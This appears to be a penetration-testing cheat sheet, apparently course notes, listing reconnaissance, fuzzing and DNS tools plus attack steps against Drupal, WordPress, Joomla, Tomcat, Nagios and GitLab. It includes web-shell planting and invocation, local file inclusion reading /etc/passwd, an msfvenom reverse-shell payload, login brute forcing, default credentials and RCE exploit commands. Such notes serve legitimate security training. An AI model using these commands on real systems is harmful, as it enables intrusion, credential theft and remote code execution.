Incorrect DNS Resolution
The domain and IP need to be added in the /etc/hosts file:
1
sudo nano /etc/hosts
CMS Scanner
Tool - cmsmap
Command syntax:
1
python cmsmap.py https://<IP>
URL to download it: github-cmsmap
Tool - cmseek
1
python3 cmseek.py -u <domain.com>
More info in: CMSeeK
Sniffers
Wireshark
Tcpdump
https://github.com/DanMcInerney/net-creds
https://github.com/lgandx/PCredz
Test SSL Certificate
Tool - Testssl
Syntax:
1
./testssl.sh <domain.com>
URL to download it: Github
Vulnerability Web Scanner
Tool - Nikto
Syntax:
1
nikto -h <http://IP>
Tool - Nuclei
Syntax:
1
nuclei -u <https://IP>
More information and download it: https://github.com/projectdiscovery/nuclei
Other automatic Tools
recon-ng
Nessus
OpenVAS
Tools for Testing Web Applications
Burpsuite: intruder, repeater, intercept
Owasp ZAP: Hub to view hidden fields, crawling, etc.
Tools to Discover Web Technology
Whatweb
1
whatweb http://<IP>
Wappalyzer
Curl and wget Commands
Curl and Wget are both command-line tools used for downloading files from the internet. They valuable utilities for fetching files and data from web servers efficiently.
Curl
Example:
1
curl <http://<IP>/<file.txt>>
Wget
Example:
1
wget <http://<IP>/<file.txt>>
Example to do it recursively:
1
wget <http://IP> -r
Tool for Detecting WAF (Web Application Firewall)
wafw00f
Command example:
1
wafw00f <https://domain.org>
URL to github: wafw00f
Add a Proxy to route all Traffic
Burpsuite and OwaspZAP are very good tools for it.
Proxychains is a very useful tool in Linux, which routes all traffic coming from any command-line tool to any proxy we specify.
Proxychains adds a proxy to any command-line tool and is hence the simplest and easiest method to route web traffic of command-line tools through our web proxies.
To use proxychains, we first have to edit /etc/proxychains.conf, comment out the final line and add a new line at the end of it.
Example of new line:
1
http 127.0.0.1 8080
Example to run a curl command with proxychains:
1
proxychains curl http://SERVER_IP:PORT
If we go to our web proxy (Burpsuite for example), we will see that the request has indeed gone through it.
It can be done with Metasploit, with the parameter RPROXIES.
Example:
1
set RPROXIES HTTP:127.0.0.1:8080
Enumerate DNS Information about a Domain
Tool - dnsenum
Command syntax:
1
dnsenum -o <output.xml> <example.com>
Tool - whois
Command syntax:
1
whois <IP or domain>
Tool - Nslookup
Command syntax:
1
nslookup [options] [domainName]
Web Content Scanner and Fuzzing
dirb is an Interesting tool to find subdirectories:
1
dirb <http://target> <pathWordlist>
Fuzzing for Subdomains and Subdirectories
ffuf is an interesting tool to find subdirectories and subdomains.
FInd subdirectories:
1
ffuf -w <pathWordlist>:FUZZ -u https://target/FUZZ
GET - Parameter fuzzing:
1
ffuf -w </path/to/values.txt> -u <https://target/script.php?valid_name=FUZZ> -fc 401
POST - Parameter fuzzing:
1
ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401
Find subdomains:
1
ffuf -w <subdomains.txt> -u <http://website.com/> -H “Host: FUZZ.website.com”
Example:
1
ffuf -w namelist.txt:FUZZ -u http://10.129.203.101/ -H 'Host:FUZZ.inlanefreight.local' -fs 15157
Useful dictionary: /SecLists/Discovery/DNS/subdomains-top1million-5000.txt
Find extensions:
1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ
To find files with the extension php:
1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
To find parameters:
1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'
Filter by size or by code to see the different ones:
1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
To find LFI with that parameter found:
1
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://165.22.118.93:30678/index.php?view=FUZZ' -fs 1935
Tip: In PHP, “POST” data “content-type” can only accept “application/x-www-form-urlencoded”. So, we can set that in “ffuf” with “-H ‘Content-Type: application/x-www-form-urlencoded’”.
Example:
1
curl <http://admin.academy.htb:PORT/admin/admin.php> -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
Parameter ‘fc’ status code.
Parameter ‘fs’ response size.
More Tools - Find Subdomains
Sublist3r
https://github.com/aboul3la/Sublist3r
CTR - Online tool
https://crt.sh/
dnsenum
1
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
Zone Transfer
Zone transfer in pentesting is the process of obtaining DNS zone data from a target to gather valuable information about its domain names, subdomains, and network structure, helping to identify potential vulnerabilities and entry points.
- Identifying Nameservers
1
nslookup -type=NS zonetransfer.me
- Perform the Zone transfer using
-type=anyand-query=AXFRparameters. Testing for ANY and AXFR Zone Transfer
1
nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja
Example Subdomain Brute Forcing
1
for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
Try zone transfer
Example:
1
dig axfr @<IP> <domain.com>
Pentest Common CMS
Drupal
Discovery
A Drupal website can be identified in several ways, including by the header or footer message Powered by Drupal, the standard Drupal logo, the presence of a CHANGELOG.txt file or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.
1
curl -s http://drupal.domain.local | grep Drupal
Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.
Enumeration
1
curl -s http://domain.local/CHANGELOG.txt | grep -m2 ""
Tool - droopescan
Droopescan is an open-source tool designed to perform vulnerability scans on Drupal-based content management systems (CMS). It aims to identify potential weaknesses and vulnerabilities in websites that use the Drupal CMS.
Command:
1
droopescan scan drupal -u <http://example.org/> -t 32
More info: https://github.com/droope/droopescan
Tool - drupwn
Drupwn is a tool used for gathering information and performing security assessments on Drupal websites. It helps identify potential vulnerabilities and weaknesses in websites that use the Drupal content management system.
Command:
1
python3 drupwn --mode enum --target <https://example.com>
1
python3 drupwn --mode exploit --target https://example.com
More info: drupwn
Vulnerability - Drupalgeddon
Exploit Drupalgeddon: https://www.exploit-db.com/exploits/34992
1
python2.7 drupalgeddon.py -t http://domain.local -u <user> -p <password>
We could also use the exploit/multi/http/drupal_drupageddon Metasploit module to exploit this.
Exploit Drupalgeddon2: https://www.exploit-db.com/exploits/44448
Exploit Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3
In Metasploit: multi/http/drupal_drupageddon3
Wordpress
Tool - wpscan
Install it:
1
sudo gem install wpscan
Command syntax:
1
wpscan --url http://<IP>/ --enumerate
Looking for users, command example:
1
wpscan -e u -t 500 --url http://<domain>
Plugins:
1
wpscan --url http(s)://<domain> --enumerate p
Vulnerable plugins:
1
wpscan --url http(s)://<domain> --enumerate vp
Brute force:
1
wpscan --url http://<domain> -P <passwords.txt> -U <users.txt>
Brute force to xmlrpc login:
The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it’s faster.
1
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P <pathWordlist> --url http://<domain>
Interesting paths:
/wp-admin: login /wp-content/uploads: files contained on the server.
Manual - Discovery themes
1
curl -s http://<domain>/ | grep themes
Manual - Discovery plugins
1
curl -s http://<domain>/ | grep plugins
Other way:
1
nmap -sV --script http-wordpress-enum <IP>
Code Execution
With administrative access to WordPress, we can modify the PHP source code to execute system commands. Click on Appearance on the side panel and select Theme Editor. This page will let us edit the PHP source code directly. An inactive theme can be selected to avoid corrupting the primary theme.
Click on Select after selecting the theme, and find a page to edit it.
If for example, we can edit a page such as 404.php to add a web shell.
Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.
Example of RCE:
1
curl http://<domain>/wp-content/themes/twentynineteen/404.php?0=id
Metasploit has a module that uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell.
1
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
Vulnerable plugins - mail mastra
The source code has a parameter that allows including a file without any validation or input sanitization. By using this, we can include arbitrary files on the web server. Let’s take advantage of this to retrieve the content of the file ‘/etc/passwd’ using ‘cURL’.
1
curl -s http://domain.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Vulnerable plugin - wpDiscuz
The exploit script takes two parameters: -u the URL and -p the path to a valid post.
Example:
1
python3 wp_discuz.py -u http://domain.local -p /?p=1
We can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands which we can see in the exploit script.
1
curl -s http://domain.local/wp-content/uploads/2021/08/shell.php?cmd=id
Joomla
Fingerprinting
1
curl -s http://domain.local/ | grep Joomla
We can fingerprint the Joomla version if the README.txt file is present:
1
curl -s http://domain.local/README.txt | head -n 5
In certain Joomla installs, we may be able to fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml.
1
curl -s http://domain.local/administrator/manifests/files/joomla.xml | xmllint --format
The cache.xml file can help to give us the approximate version. It is located at plugins/system/cache/cache.xml.
Tool - droopscan
Github: https://github.com/SamJoan/droopescan
Install it:
1
sudo pip3 install droopescan
Command example:
1
droopescan scan joomla --url http://domain.local/
Tool - JoomlaScan
Github: https://github.com/drego85/JoomlaScan
Install it:
1
2
3
4
5
sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4
Command example:
1
python2.7 joomlascan.py -u http://domain.local
Tool - Joomla-bruteforce
This tool do brute force attack to login.
Github: https://github.com/ajnik/joomla-bruteforce
Example:
1
sudo python3 joomla-brute.py -u http://domain.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <user>
Vulnerability CVE-2019-10945
Github: https://github.com/dpgg101/CVE-2019-10945
Exploit: https://www.exploit-db.com/exploits/46710
Example:
1
python2.7 joomla_dir_trav.py --url "http://domain.local/administrator/" --username admin --password admin --dir /
Tomcat
Interesting paths:
/etc/tomcat9/tomcat-users.xml /manage /manager /host-manager /docs
Default credentials
tomcat:tomcat admin:admin
Footprinting/discovery
Syntax:
1
curl -s http://<domain>:<port>/docs/ | grep Tomcat
Upload a Reverse shell
- Create a reverse shell with msfvenom. Example:
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o <file.war>
- Upload into WAR File.
- When executing the uploaded file, the connection is opened.
Other option is to do it with Metasploit (the shell should be uploaded in path /manage)
Tomcat Manager - Login Brute Force
Metasploit module -> scanner/http/tomcat_mgr_login
Other way - exploit:
Exploit: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
Example:
1
python3 mgr_brute.py -U http://<domain>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
CVE-2020-1938 : Ghostcat
Command:
1
nmap -sV -p 8009,8080 <domain>
PoC: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
Code:
1
python2.7 tomcat-ajp.lfi.py <domain> -p <port> -f WEB-INF/web.xml
In some Tomcat installs, we may be able to access sensitive data within the WEB-INF file.
Synfony
Tool - eos
https://github.com/synacktiv/eos
Installation
1
2
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos
Example of usage:
1
eos scan http://domain.com --output results
Nagios
Exploit: https://www.exploit-db.com/exploits/49422
Example:
1
python3 nagiosxi-rce.py http://domain.local username password 10.10.14.236 5555
Pentest Applications
Git
This command is used to download a repository stored on web server and restore deleted files.
Syntax:
1
./gitdumper.sh http://<IP>/.git/ <pathOutput>
To view repository status and deleted files:
1
git status
To restore a delete file:
1
git checkout <fileToDownload>
GitLab
It is a web-based Git-repository hosting tool that provides wiki capabilities, issue tracking, and continuous integration and deployment pipeline functionality. It is open-source and originally written in Ruby, but the current technology stack includes Go, Ruby on Rails, and Vue.js.
Interesting paths:
/help /users/sing_in /explore
Username Enumeration
Exploit: https://www.exploit-db.com/exploits/49821
Other exploit: https://github.com/dpgg101/GitLabUserEnum
Command example:
1
./gitlab_userenum.sh --url http://<domain>:<port>/ --userlist <users.txt>
or:
1
python3 gitlab_userenum.py --url http://<domain>:<port>/ --wordlist <pathWordlist>
Caution -> GitLab’s defaults are set to 10 failed attempts resulting in an automatic unlock after 10 minutes.
Authenticated Remote Code Execution (RCE)
Exploit RCE: https://www.exploit-db.com/exploits/49951
Example of reverse shell:
1
python3 gitlab_13_10_2_rce.py -t http://<domain>:<port> -u <user> -p <password> -c '<reverseShellCode>'